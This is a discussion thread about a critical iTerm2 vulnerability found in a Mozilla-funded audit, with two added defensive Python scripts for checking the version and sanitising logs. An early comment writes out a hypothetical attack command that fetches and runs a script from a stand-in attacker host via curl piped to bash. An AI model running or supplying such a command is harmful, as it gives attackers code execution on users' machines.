
Critical Security Issue Identified in iTerm2 - sciurus
https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/
======
earthboundkid
I take it the nightmare scenario here is that you have web logs streaming in a
tmux window and an attacker accesses /404/escape-code/curl -s
[http://evil.com/pwn|bash](http://evil.com/pwn|bash)? Does the window need to
be foregrounded for the attack to work? I guess the good news is that iTerm is
Mac only, so I can't imagine that many web servers are using it.

~~~
stygiansonic
Why would the web server need to be running macOS? From my understanding an
admin could be ssh’d into a server and tailing/grepping the logs there while
using iTerm. If the malicious input was in the logs, then the attacker could
take over the admin’s machine, and by extension, possibly any machine the admin
had access to.

~~~
earthboundkid
Good point.

------
gnachman
iTerm2 author here. I’ll be glad to answer questions.

~~~
jlokier
Thanks for iTerm2. I've used it every day for years.

I'm running 3.0.15 and it reports no updates available.

On MacOS 10.9 (upgrading isn't really an option right now, it would break too
many things).

Is iTerm2 3.0.15 vulnerable?

Thanks!

~~~
jlokier
I'm puzzled by the downvote, as my question seems appropriate to me. Anyone
care to provide feedback? Thanks.

~~~
ffritz
Dude, you are running a version that came out 6 years ago, while macOS has a
yearly release schedule. iTerm would be the least of my concerns. There is
just nothing to say here other than go and upgrade it asap.

~~~
klmr
While you’re right, it’s unfortunately not that simple because macOS updates
really do break a lot of stuff (especially for developers) and, on older
hardware, degrade performance to the point of un-usability. I’ve got an MBP
from 2012, and I’ve stopped updating macOS with Sierra (10.12) due to ever
degrading performance. I’ll be forced to throw away the (perfectly
functional!) laptop at some point once I stop receiving security updates.

~~~
dlivingston
> macOS updates really do break a lot of stuff (especially for developers)

Weird example, as most of your users will be using a more recent version of
macOS. So, while your code isn't 'broken' for you, on your 6+ year old OS,
it's broken for the vast majority of end users who will want to compile your
code.

~~~
jlokier
Weird response. Probably most developers are not shipping code for end users
to compile.

Of those, most are probably developing websites and webapps, and the only
thing about the end user that matters is which browser, not which OS, let
alone version.

But there are also developers writing apps that include older devices in their
target. That means avoid the newest Mac tools because you can't compile for
old enough targets on it.

Then there are Mac app developers that include older versions of the OS in
their target market, and have to use older tools to ensure the target range is
covered. This gets harder over time because Apple makes it deliberately hard.

Some of them even write mobile apps that target users of older devices.
Shocking, I know, but there are a lot of users of older iOS devices these
days, and sometimes you're tasked with making an app for them.

Then there are developers whose work talks to dev hardware attached to the
computer, which needs drivers, which stop being supported at some OS version.
The end users get a lump of hardware, and all the developer needs is an OS
that can talk to the dev kit.

Then there are developers doing maintenance on older MacOS, iOS, or device
firmware, and produce updates that are drop-in compatible to exactly the same
set of target users as are already running the software. Not every consumer
app will bother with this, but some business-critical things demand it.

I think the use case of "end users who will want to compile your code" is
almost negligibly small in comparison, and Linux is probably a better OS for
doing that sort of thing anyway :-)

I've done all the above, on Mac, Windows, and Linux. VMs work great for Linux,
and ok for Windows. Mac is a pain for this, because of Apple's policies to try
to make it difficult.

~~~
dlivingston
> most are probably developing websites and webapp

And you can't port your NPM, React, etc. environment over to a new OS without
breaking things?

> the only thing about the end user that matters is which browser

As a web dev, you want to use the latest ES/HTML/CSS specs while still
targeting as many users as possible. How can you target modern users when the
browsers on your 6-year-old system aren't up-to-date enough to render what most
users will see?

> Then there are Mac app developers that include older versions of the OS in
> their target market, and have to use older tools to ensure the target range
> is covered. This gets harder over time because Apple makes it deliberately
> hard.

This is a valid point. There are still people compiling on and for Windows XP
and MS-DOS machines, after all. Hell, you can find hobbyists who only like
writing Commodore 64 programs. Writing to target older platforms is hyper-
niche and the computer you use to do that shouldn't be your main workstation.

> Shocking, I know, but there are a lot of users of older iOS devices these
> days, and sometimes you're tasked with making an app for them.

In which context? Given that 97% of devices are on iOS 11 or later
([https://twitter.com/reneritchie/status/1159288325003460609](https://twitter.com/reneritchie/status/1159288325003460609)),
I can't imagine _why_ you care about those users.

> Then there are developers whose work talks to dev hardware attached to the
> computer, which needs drivers, which stop being supported at some OS
> version. The end users get a lump of hardware, and all the developer needs
> is an OS that can talk to the dev kit.

This is a valid point.

> Then there are developers doing maintenance on older MacOS, iOS, or device
> firmware, and produce updates that are drop-in compatible to exactly the
> same set of target users as are already running the software. Not every
> consumer app will bother with this, but some business-critical things demand
> it.

A valid point as well - this is exactly the context in which COBOL is still
used.

> I think the use case of "end users who will want to compile your code" is
> almost negligibly small in comparison, and Linux is probably a better OS for
> doing that sort of thing anyway :-)

That's...not true. macOS developers exist, you know, and there's a reason that
Macs ship with a strong tooling kit.

Besides, if you distribute dynamically-linked binaries, you want an up-to-date
OS so that the dylibs you're linking to actually exist...

Just some thoughts from a junior dev :)

~~~
jlokier
> As a web dev, you want to use the latest ES/HTML/CSS specs [...]. How can
> you target modern users when the browsers on your 6-year-old system aren't
> up-to-date enough to render what most users will see?

You can run latest browsers just fine. I'm talking to you now through Firefox
Beta that was released a couple of days ago, on my 6 years old OS. It works
just great, latest ES/HTML/CSS specs and all, same as yours. It's more up to
date than my phone!

However, if you're serious about testing, portability, accessibility,
inclusion, quality, and just looking good to a worldwide audience for your
site or app, then you won't rely on testing in a single browser on your own
machine.

Especially if your own machine is running the latest bleeding-edge version (as
mine is). You may be using something like Selenium, BrowserStack, Sauce Labs
etc. with a testing pipeline. Or (as I do), a bunch of browsers in cloud-based
VMs.

Even if it's just a manual testing pipeline, there are so many ways a complex
web app can render or behave differently on different browsers it's not funny,
so well worth testing complex things.

Imagine trying to write something like a mini Google Sheets or Docs without
testing on different browsers, while intending for it to be usable to a wide
audience. It would break in more ways than you could imagine from testing only
on the latest browser on your own machine.

> Given that 97% of devices are on iOS 11 or later [...] I can't imagine why
> you care about those users.

Not all apps are for consumers.

And not all apps are for distribution on an app store.

And some on a store are for particular audiences. For example government apps,
financial services apps targeting people with little cash, and those running
on fleets of purchased devices in a business (such as tablets) for a dedicated
purpose.

E.g. one of those I've dealt with was effectively a museum full of tablets
fixed in place. Nobody's going to purchase new hardware in quantity if the old
ones are working fine, just to please a developer who can't figure out how to
build for an old target. (When I did that job, it wasn't iOS, but the same
principle applies.)

> A valid point as well - this is exactly the context in which COBOL is still
> used.

I wonder if you're trying to suggest "really really old" with COBOL :-) The
same maintenance issues apply to maintaining apps released just a couple of
years ago, which supported 5 year old devices at the time they were released,
and so aim to maintain the same until they have a major version change.

(Especially business apps rolled out on a fleet of purchased devices, where
continuity is a requirement. But also, consumer apps if you care about the
customers.)

> macOS developers exist, you know

I do know, where do you think this thread came from :-)

But the vast majority of shipped code is not open source, and when it is, most
of it is used only on servers or inside devices.

------
ohadron
I clicked "Check for updates", saw that there is an update ready to install.
Once installed I compared the version number and it wasn't the latest. I
probably missed an update in the past.

Make sure that after reinstallation you're at v3.3.6+
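
Checking the version ohadron mentions on every Mac you administer is easy to
script. The snippet below is an added example written for this page, not
iTerm2's own code: it reads CFBundleShortVersionString from the app bundle's
Info.plist (plistlib reads both the binary and the XML form) and compares it
component by component against 3.3.6, so that a version like 3.10.0 or a
pre-release like 3.3.7beta1 is compared correctly rather than as a string.
The default bundle path /Applications/iTerm.app and the small XML plist used
as sample input are assumptions made for the example.

```python
import plistlib
import re
import sys
from pathlib import Path

FIXED_VERSION = "3.3.6"   # the version the thread says to be at or past

# Constructed minimal Info.plist for demonstration only.  A real bundle's
# Info.plist is usually binary, which plistlib.loads also accepts.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>CFBundleShortVersionString</key><string>3.3.6</string>
</dict>
</plist>
"""


def parse_version(version: str) -> tuple:
    """'3.3.7beta1' -> (3, 3, 7).  Only the leading digits of each dotted
    component count, so pre-release suffixes do not break the comparison."""
    parts = []
    for component in version.split("."):
        m = re.match(r"\d+", component)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def version_ge(have: str, want: str) -> bool:
    """True when `have` is the same as or newer than `want`."""
    a, b = parse_version(have), parse_version(want)
    width = max(len(a), len(b))
    # pad the shorter tuple with zeros so 3.4 compares as 3.4.0
    return a + (0,) * (width - len(a)) >= b + (0,) * (width - len(b))


def version_from_plist(data: bytes) -> str:
    """Extract the marketing version from Info.plist bytes (XML or binary)."""
    return plistlib.loads(data)["CFBundleShortVersionString"]


def installed_version(app: str = "/Applications/iTerm.app") -> str:
    """Read the installed bundle's version; path is an assumption."""
    return version_from_plist((Path(app) / "Contents" / "Info.plist").read_bytes())


def is_patched(version: str) -> bool:
    """True when `version` is at or past FIXED_VERSION."""
    return version_ge(version, FIXED_VERSION)


if __name__ == "__main__":
    app = sys.argv[1] if len(sys.argv) > 1 else "/Applications/iTerm.app"
    try:
        v = installed_version(app)
    except FileNotFoundError:
        sys.exit(f"no iTerm2 bundle found at {app}")
    state = "at or past" if is_patched(v) else "OLDER THAN"
    print(f"iTerm2 {v}: {state} {FIXED_VERSION}")
    sys.exit(0 if is_patched(v) else 1)
```

The exit status makes it usable from an MDM script or a fleet audit job; a
non-zero status means the bundle at that path is still older than 3.3.6.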

------
pwinnski
I checked for update, installed and relaunched... and found that all my tabs
were exactly as they were before, including my tab that had an ssh tunnel
running. The only thing that changed was that iTerm got more secure.

Impressive work, gnachman.

~~~
jki275
what??? Mine dumped all my windows and gave me back just one blank terminal
window. I got robbed!

~~~
gnachman
If you have non-native fullscreen windows it's Apple's fault. They don't like
this window style so they don't support restoring it. Could also be that you
have "System Prefs > General > Close windows when quitting an app" turned on,
or that you have iTerm2's "Prefs>General>Startup>Window restoration policy"
set to something other than "Use system window restoration policy"

------
vosper
I'm sure there are a lot of people reading HN who use iTerm2 every day. For me
it's an essential tool.

If that's you, and you're not already a contributor to the continued
development of this software, then today is a great day to start!

There's a Patreon, so for many people it'll be very easy to begin helping out:

[https://www.patreon.com/gnachman/overview](https://www.patreon.com/gnachman/overview)

(I have no affiliation with iTerm2 or its author; I just want to encourage
people to support important software)

~~~
otachack
Definitely a ton of users. IMO though, I've just used the stock Terminal on
macOS for the past 4 years or so. I don't see myself using any of the
features iTerm2 brings to the table.

~~~
tengbretson
If you're proficient with tmux I'm not exactly sure what iTerm brings to the
table.

~~~
jefftk
Can tmux do focus-follows-mouse for selecting between panes? (Last time I
looked into it this wasn't possible)

~~~
lonelappde
Why would you use that over keyboard switching?

FFM is used when you have overlapping windows and want to focus a window
without raising it.

~~~
jefftk
Personal preference? I have always liked FFM, and while I like the keyboard
for many things I find it much more awkward than the mouse for selecting among
many (10+) terminals tiling the screen.

(I don't want overlapping windows for anything, never have, and am still sad I
can't get OS-wide FFM on a mac.)

------
symlinkk
What's the exploit? I keep clicking links trying to figure it out and no one
says what it actually is.

~~~
lincolnq
I think it's something to do with: iterm2 interprets <magic control sequence>
as triggering the tmux integration feature. But you can put that magic control
sequence into other places.

~~~
Dylan16807
Sure, but that explains nothing about how the tmux integration ends up running
a local command. How is this doing anything more than confusing the terminal
about buffers?
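
The scenario earthboundkid and stygiansonic sketch near the top of the thread
(attacker-controlled request paths landing in a log that an admin tails over
ssh inside iTerm2) and lincolnq's point that a magic control sequence can be
placed anywhere the terminal will print it share one practical defence: do not
let raw control bytes reach the terminal at all. The filter below is an added
example written for this page; it is not iTerm2 code and does not reproduce
the sequence from the advisory, which the thread does not spell out. The log
lines are constructed, and the escape sequences embedded in them are ordinary
documented xterm ones (set window title, clear screen) standing in for
whatever sequences a given terminal honours. Every C0/C1 control character and
every undecodable byte is rewritten into the caret notation `cat -v` uses, and
lines that needed rewriting are flagged so the same logic doubles as a
detection rule.

```python
import sys

# Constructed sample access-log lines for this example (not from any real
# server).  The second line carries ESC bytes inside the request path, the
# one field an HTTP client fully controls: an xterm "set window title" OSC
# (ESC ] 0 ; ... BEL) followed by CSI 2J (clear screen).  Both are ordinary
# documented sequences chosen only to show that the path reaches the log
# byte-for-byte; they are not the sequence from the iTerm2 advisory.
SAMPLE_LOG_LINES = [
    b'203.0.113.5 - - [09/Oct/2019:12:00:00 +0000] '
    b'"GET /index.html HTTP/1.1" 200 512\n',
    b'198.51.100.7 - - [09/Oct/2019:12:00:01 +0000] '
    b'"GET /404/\x1b]0;owned\x07\x1b[2J HTTP/1.1" 404 162\n',
    b'192.0.2.9 - - [09/Oct/2019:12:00:02 +0000] '
    b'"GET /caf\xc3\xa9 HTTP/1.1" 200 90\n',
]

_KEEP = {"\t", "\n"}   # the only control characters allowed through


def _escape_char(ch: str) -> str:
    """Return a printable stand-in for a control code point, else the code point."""
    cp = ord(ch)
    if ch in _KEEP:
        return ch
    if cp < 0x20 or cp == 0x7F:
        # C0 controls and DEL in caret notation, as `cat -v` prints them:
        # ESC -> ^[, BEL -> ^G, CR -> ^M, DEL -> ^?
        return "^" + chr((cp + 0x40) & 0x7F)
    if 0x80 <= cp <= 0x9F:
        # C1 controls (U+009B is the single-byte CSI) in cat -v's M-^X form
        return "M-^" + chr(cp - 0x40)
    if 0xDC80 <= cp <= 0xDCFF:
        # a byte that was not valid UTF-8 (kept by surrogateescape): show \xNN
        return "\\x%02x" % (cp - 0xDC00)
    return ch


def sanitize_terminal_output(data: bytes) -> str:
    """Decode untrusted bytes and neutralise everything a terminal could act on.

    TAB and LF survive; every other C0 control, DEL, C1 control and undecodable
    byte is rewritten into a visible form, so the terminal receives only
    printable text and line breaks, whatever escape sequences it implements.
    """
    text = data.decode("utf-8", errors="surrogateescape")
    return "".join(_escape_char(ch) for ch in text)


def contains_terminal_controls(data: bytes) -> bool:
    """True when `data` holds anything sanitize_terminal_output would rewrite.

    Usable as a detection rule over logs: a request path should never need it.
    """
    text = data.decode("utf-8", errors="surrogateescape")
    return any(_escape_char(ch) != ch for ch in text)


def main() -> None:
    # Filter mode: `tail -f access.log | python3 sanitize_log.py`.  With no
    # piped input, fall back to the constructed sample so the script demos itself.
    if sys.stdin.isatty():
        lines = SAMPLE_LOG_LINES
    else:
        lines = iter(sys.stdin.buffer.readline, b"")
    for raw in lines:
        flag = "!" if contains_terminal_controls(raw) else " "
        sys.stdout.write(flag + " " + sanitize_terminal_output(raw))
        sys.stdout.flush()


if __name__ == "__main__":
    main()
```

Run it as `ssh host tail -f /var/log/nginx/access.log | python3 sanitize_log.py`
(the script name is assumed). For interactive use, `cat -v` or `less` without
`-r` gives a similar result; the function form is what you would reuse inside
a log viewer or in an alert that fires when control bytes show up in request
paths, since legitimate clients have no reason to send them.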

------
lrc
(OT) I like iTerm for its smart select/copy behavior, mostly, but stopped
using it about 3 months ago because I often caught it using immense amounts of
RAM, slowing everything down on my 32GB trashcan pro. I thought it might have
something to do with the GPU, but it doesn't happen on Terminal.app, which is
otherwise good enough, but I miss iTerm every time I have to cmd-C or adjust
the span of a double click. Has anyone else observed the RAM trouble? Maybe I
have a bad setting?

~~~
gnachman
Probably a memory leak. I’d love to get a heapshot to debug it. See
instructions at [https://iterm2.com/bugs](https://iterm2.com/bugs)

~~~
lrc
Thank you, I will do this.

------
i_cant_speel
This got me to actually update and I love the new minimal theme. I also like
having CPU/Memory usage statistics in the status bar.

------
JohnBooty
Thank you, Mozilla. =)

~~~
yread
And congrats Radically Open Security

------
vagab0nd
Serious question: I've heard great things about iTerm2. I'm on Linux running
xterm and a tiling window manager. What am I missing out on?

~~~
root_axis
For the mac, it's the best there is, but if you're on linux gnome-terminal is
better.

~~~
veidr
Wait, do you mean "if you're on linux gnome-terminal is better _(because if
you're on linux you can't use iTerm2)_?"

Because that's the only way your comment makes sense to me.

~~~
root_axis
What I mean to say is, gnome-terminal > iTerm2, but if you're on a mac, iTerm2
is the next best thing.

